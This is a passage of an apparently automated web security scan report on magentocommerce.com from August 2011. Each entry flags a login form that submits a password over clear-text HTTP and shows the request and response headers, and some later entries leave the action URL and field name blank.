Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fpartners%2Fhosting%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:11 GMT
Content-Length: 37154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.108. http://www.magentocommerce.com/partners/industry-partners

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/industry-partners

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /partners/industry-partners HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176341; expires=Sat, 11-Aug-2012 15:12:21 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fpartners%2Findustry%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:22 GMT
Content-Length: 38023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.109. http://www.magentocommerce.com/partners/solution-partners

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/solution-partners

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /partners/solution-partners HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176334; expires=Sat, 11-Aug-2012 15:12:14 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fpartners%2Fsolution%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:14 GMT
Content-Length: 39161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.110. http://www.magentocommerce.com/partners/view/117/gorilla

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/view/117/gorilla

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /partners/view/117/gorilla HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176374; expires=Sat, 11-Aug-2012 15:12:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fpartners%2Fview%2F117%2Fgorilla%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:54 GMT
Content-Length: 57995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.111. http://www.magentocommerce.com/pl

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /pl

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /pl HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176513; expires=Sat, 11-Aug-2012 15:15:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fpl%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:13 GMT
Content-Length: 70432

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.112. http://www.magentocommerce.com/product/community-edition

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/community-edition

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /product/community-edition HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175665; expires=Sat, 11-Aug-2012 15:01:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fproduct%2Fcommunity-edition%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:05 GMT
Content-Length: 32482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.113. http://www.magentocommerce.com/product/compare

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/compare

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /product/compare HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175710; expires=Sat, 11-Aug-2012 15:01:50 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Fproduct%2Fcompare%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:50 GMT
Content-Length: 47177

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.114. http://www.magentocommerce.com/product/deployed-solutions

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/deployed-solutions

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /product/deployed-solutions HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175705; expires=Sat, 11-Aug-2012 15:01:45 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:45 GMT
Content-Length: 32561

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.115. http://www.magentocommerce.com/product/emerging-business

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/emerging-business

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /product/emerging-business HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_activity=1313170894; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.2.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171056; expires=Sat, 11-Aug-2012 13:44:16 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:16 GMT
Content-Length: 33707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.116. http://www.magentocommerce.com/product/enterprise-community-faqs

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/enterprise-community-faqs

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /product/enterprise-community-faqs HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175681; expires=Sat, 11-Aug-2012 15:01:21 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A35%3A%22%2Fproduct%2Fenterprise-community-faqs%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:21 GMT
Content-Length: 42996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.117. http://www.magentocommerce.com/product/enterprise-edition

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/enterprise-edition

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /product/enterprise-edition HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:00:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175633; expires=Sat, 11-Aug-2012 15:00:33 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A28%3A%22%2Fproduct%2Fenterprise-edition%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:00:33 GMT
Content-Length: 37947

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.118. http://www.magentocommerce.com/product/enterprise-level

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/enterprise-level

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /product/enterprise-level HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; exp_domain=magentocommerce.com; exp_last_visit=997810832; exp_last_activity=1313170832; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.1.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894; homepage_intro=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171048; expires=Sat, 11-Aug-2012 13:44:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:08 GMT
Content-Length: 32647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.119. http://www.magentocommerce.com/product/faq

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/faq

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /product/faq HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175724; expires=Sat, 11-Aug-2012 15:02:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fproduct%2Ffaq%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:04 GMT
Content-Length: 38677

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.120. http://www.magentocommerce.com/product/features

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/features

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /product/features HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175665; expires=Sat, 11-Aug-2012 15:01:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fproduct%2Ffeatures%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:05 GMT
Content-Length: 47349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.121. http://www.magentocommerce.com/product/hosted-solutions

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/hosted-solutions

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /product/hosted-solutions HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
